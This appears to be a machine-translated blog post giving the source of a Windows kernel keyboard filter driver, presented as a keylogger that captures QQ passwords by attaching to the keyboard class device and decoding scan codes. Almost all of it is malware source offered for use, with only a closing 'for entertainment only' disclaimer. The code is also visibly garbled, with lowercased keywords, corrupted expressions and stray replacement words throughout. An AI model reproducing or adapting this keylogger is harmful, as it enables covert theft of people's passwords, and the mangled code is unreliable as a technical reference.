The keyboard recorder can capture the QQ Password

Because the QQ password is specially protected, the QQ password cannot be detected by remotely injecting the content of the password box and obtaining keyboard messages through hooks, however, by filtering the keyboard driver, you can record the content during the QQ password input, and attach the source code.

# Define dbg 1 # include <ntddk. h> # include <ntstrsafe. h> # include "keymonitor. H "extern pobject_type iodriverobjecttype; pio_stack_location g_islcompletion; int g_caps, g_shift, g_num; unsigned char asciitbl [] = {0x00, 0x1b, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2d, 0x3d, 0x08, 0x09, // normal0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6f, 0x70, 0x5b, 0x5d, 0x0d, 0x00, 0x61, 0x73, 0x64, 0x66, 0x67, 0x68, 0x6a, 0x6b, 0x6c, 0x3b, 0x27, 0x60, 0x00, 0x5c, 0x7a, 0x78, 0x63, 0x76, 0x62, 0x6e, 0x6d, 0x2c, 0x2e, 0x2f, 0x00, 0x2a, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2d, 0x34, 0x35, 0x36, 0x2b, 0x31,0x32, 0x33, 0x30, 0x2e, 0x00, 0x1b, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2d, 0x3d, 0x08, 0 X09, // caps0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4f, 0x50, 0x5b, 0x5d, 0x0d, 0x00, 0x41, 0x53,0x44, 0x46, 0x47, 0x48, 0x4a, 0x4b, 0x4c, 0x3b, 0x27, 0x60, 0x00, 0x5c, 0x5a, 0x58, 0x43, 0x56, 0x42, 0x4e, 0x4d, 0x2c, 0x2e, 0x2f, 0x00, 0x2a, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2d, 0x34, 0x35, 0x36, 0x2b, 0x31,0x32, 0x3 3, 0x30, 0x2e, 0x00, 0x1b, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5e, 0x26, 0x2a, 0x28, 0x29, 0x5f, 0x2b, 0x08, 0x09, // shift0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4f, 0x50, 0x7b, 0x7d, 0x0d, 0x00, 0x41, 0x53,0x44, 0x46, 0x47, 0x48, 0x4a, 0x4b, 0x4c, 0x3a, 0x22, 0x7e, 0x00, 0x7c, 0x5a, 0x58, 0x43, 0x56, 0x42, 0x4e, 0x4d, 0x3c, 0x3e, 0x3f, 0x00, 0x2a, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0 0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2d, 0x34, 0x35, 0x36, 0x2b, 0x31,0x32, 0x33, 0x30, 0x2e, 0x00, 0x1b, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5e, 0x26, 0x2a, 0x28, 0x29, 0x5f, 0x2b, 0x08, 0x09, // caps + shift0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6f, 0x70, 0x7b, 0x7d, 0x0d, 0x00, 0x61, 0x73,0x64, 0x66, 0x67, 0x68, 0x6a, 0x6b, 0x6c, 0x3a, 0x22, 0x7e, 0x00, 0x7c, 0x7 A, 0x78, 0x63, 0x76,0x62, 0x6e, 0x6d, 0x3c, 0x3e, 0x3f, 0x00, 0x2a, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2d, 0x34, 0x35, 0x36, 0x2b, 0x31,0x32, 0x33, 0x30, 0x2e}; ntstatusobreferenceobjectbyname (_ in punicode_string objectname, _ in ulong attributes, _ in_opt paccess_state accessstate, _ in_opt access_mask desiredaccess, _ in Pobject_type objecttype, _ in partition accessmode, _ inout_opt pvoid parsecontext, _ out pvoid * object); void kmunload (in pdriver_object pdriverobject); ntstatus kmunhandleirp (device_object * deviceobject, IRP * IRP); ntstatus kmopenclose (device_object * deviceobject, IRP * IRP); ntstatus kmpnp (device_object * deviceobject, IRP * IRP); ntstatus kmpower (device_object * deviceobject, IRP * IRP); ntstatus Kmadddevice (in pdriver_object pdriverobject, in punicode_string puserviceregpath); ntstatus kmread (device_object * deviceobject, IRP * IRP); ntstatus kmreadcompletion ); void kmprintkey (uchar Sch); ntstatus DriverEntry (in pdriver_object pdriverobject, in punicode_string puserviceregpath) {int I = 0; kdprint ("this is my driver, henzox! \ N "); pdriverobject-> driverunload = kmunload; for (I = 0; I <irp_mj_maximum_function + 1; I ++) {pdriverobject-> majorfunction [I] = kmunhandleirp;} pdriverobject-> majorfunction [irp_mj_create] = kmopenclose; pdriverobject-> majorfunction [irp_mj_close] = kmopenclose; pdriverobject-> majorfunction [irp_mj_pnp] = kmpnp; pdriverobject-> majorfunction [irp_mj_power] = kmpower; pdriverobject-> majorfunction [I Parameters] = kmread; return kmadddevice (pdriverobject, puserviceregpath);} void kmunload (in pdriver_object pdriverobject) {pdevice_object tmpdevice; Specify mydeviceextension; kdprint! \ N "); tmpdevice = pdriverobject-> deviceobject; while (tmpdevice) {pdevice_object nextdevice; kdprint (" delete partition BJ: 0x % P. \ n ", tmpdevice); mydeviceextension = (pmy_device_extension) tmpdevice-> deviceextension; // If the completion routine is not executed, cancel the completion routine if (mydeviceextension-> islcompletion) {mydeviceextension-> islcompletion-> completionroutine = NULL; // only a few flags related to the completion routine are removed. Other flags in the stack are very important and cannot be removed from mydeviceextension-> islcomp Letion-> Control & = ~ (Response | response | sl_invoke_on_error);} iodetachdevice (mydeviceextension-> attachedto); nextdevice = tmpdevice-> nextdevice; iodeletedevice (tmpdevice); tmpdevice = nextdevice ;}} ntstatus kmunhandleirp (device_object * deviceobject, IRP * IRP) {kdprint ("IRP: % d \ n", iogetcurrentirpstacklocation (IRP)-> majorfunction); ioskipcurrentirpstacklocation ); return iocalldriver (PM Y_device_extension) deviceobject-> deviceextension)-> attachedto, IRP);} ntstatus kmopenclose (device_object * deviceobject, IRP * IRP) {kdprint ("kmopenclose. \ n "); IRP-> iostatus. status = STATUS_SUCCESS; IRP-> iostatus. information = 0; iocompleterequest (IRP, io_no_increment); return STATUS_SUCCESS;} ntstatus kmpnp N (IRP); kdprint ("kmpnp. \ n "); Switch (PIO-> minorfunction) {default: ioskipcurrentirpstacklocation (IRP); iocalldriver (pmy_device_extension) deviceobject-> deviceextension)-> attachedto, IRP ); break;} return STATUS_SUCCESS;} ntstatus kmpower (device_object * deviceobject, IRP * IRP) {kdprint ("kmpower. \ n "); ioskipcurrentirpstacklocation (IRP); postartnextpowerirp (IRP); Return pocalldriver (pmy_device _ Extension) deviceobject-> deviceextension)-> attachedto, IRP);} ntstatus kmadddevice (in pdriver_object pdriverobject, in bytes) {unicode_string delimiter; pdriver_object kbddriver; ntstatus status; pdevice_object tmpdevice, mydevice; unicode_string usdevicename; wchar buff [64]; int Index = 0; pmy_device_extension deviceextension; rtlinitunicodestring (& usobjectname, l "\ dri Ver \ kbdclass "); status = obreferenceobjectbyname (& usobjectname, obj_case_insensitive, null, 0, iodriverobjecttype, kernelmode, null, (pvoid) & kbddriver); If (! Nt_success (Status) {kdprint ("find the KBD class failed! \ N "); Return status;} tmpdevice = kbddriver-> deviceobject; while (tmpdevice) {swprintf (buff, l" \ device \ mydevice % d ", index ++); rtlinitunicodestring (& usdevicename, buff); status = iocreatedevice (pdriverobject, sizeof (my_device_extension), & usdevicename, tmpdevice-> devicetype, tmpdevice-> characteristics, false, & mydevice); If (! Nt_success (Status) {obdereferenceobject (kbddriver); Return status;} kdprint ("cmdbj: 0x % P. \ n ", mydevice); ioattachdevicetodevicestack (mydevice, tmpdevice); deviceextension = (pmy_device_extension) mydevice-> deviceextension; deviceextension-> attachedto = tmpdevice; /* setup my device */mydevice-> stacksize = tmpdevice-> stacksize + 1; mydevice-> flags | = (tmpdevice-> flags & (do_buffered_io); // at Io Flags are assigned to some flags when createdevice is created. These flags should be retained here (such as do_device_has_name, which involves reference count) tmpdevice = tmpdevice-> nextdevice;} obdereferenceobject (kbddriver ); return STATUS_SUCCESS;} ntstatus kmread (device_object * deviceobject, IRP * IRP) {pmy_device_extension mydeviceextension; // kdprint ("kmread. \ n "); mydeviceextension = (pmy_device_extension) deviceobject-> deviceextension; iocopycurrentirpstacklocationtonext (IRP );/* Iosetcompletionroutine can be used only when the driver ensures that the routine is not uninstalled before it is called. If not, iosetcompletionroutineex must be used, enable the kernel to prevent the driver from being uninstalled * // * iosetcompletionroutine (IRP, kmreadcompletion, null, true); */iosetcompletionroutineex (deviceobject, IRP, kmreadcompletion, null, true, true, true); mydeviceextension-> islcompletion = iogetnextirpstacklocation (IRP); Return iocalldriver (pmy_device_extension) deviceobject-> Deviceextension)-> attachedto, IRP);} ntstatus kmreadcompletion (pdevice_object deviceobject, pirp IRP, pvoid context) {pmy_device_extension mydeviceextension; puchar Buff; int Len; // kdprint ("kmreadcompletion: Key -- 0x % P \ n", * (Pulong) IRP-> associatedirp. systembuffer);/* The completion routine of this IRP has been executed, and the stack will be automatically cleared when the function is executed, so the stack should not be referenced */mydeviceextension = (pmy_device_extension) deviceobject-> deviceextension; mydeviceexte Nsion-> islcompletion = NULL; If (nt_success (IRP-> iostatus. status) {// because the device flag is do_buffered_io, the kernel allocates the buffer buff = IRP-> associatedirp. systembuffer; // The returned values are generally stored in information, that is, Len = IRP-> iostatus. information; If (buff [4] = 0) {/* press the keyboard */switch (buff [2]) {Case 0x3a: g_caps = (g_caps = 1 )?; Break; Case 0x2a: Case 0x36: g_shift = 1; break; Case 0x45: g_num = (g_num = 1 )?; Break; default: kmprintkey (buff [2]); break ;}} else if (buff [4] = 1) {/* release of keyboard */switch (buff [2]) {Case 0x2a: Case 0x36: g_shift = 0; break; default: Break ;}}} if (IRP-> pendingreturned) {iomarkirppending (IRP);} return IRP-> iostatus. status;} void kmprintkey (uchar Sch) {uchar CH = 0; If (Sch <0x47) | (Sch> = 0x47 & Sch <0x54) & g_num = 0) {CH = asciitbl [Sch]; if (g_shift & g_caps) CH = asciitbl [Sch + 84*3]; else if (g_shift = 1) CH = asciitbl [Sch + 84*2]; else if (g_caps = 1) CH = asciitbl [Sch + 84];} If (CH = 0x08) {// dbuplint ("return ");} if (CH> = 0x20 & Ch <0x7f) {dbuplint ("% C", CH );}}

The keyboard ing table comes from the network. The entire code segment is for entertainment only.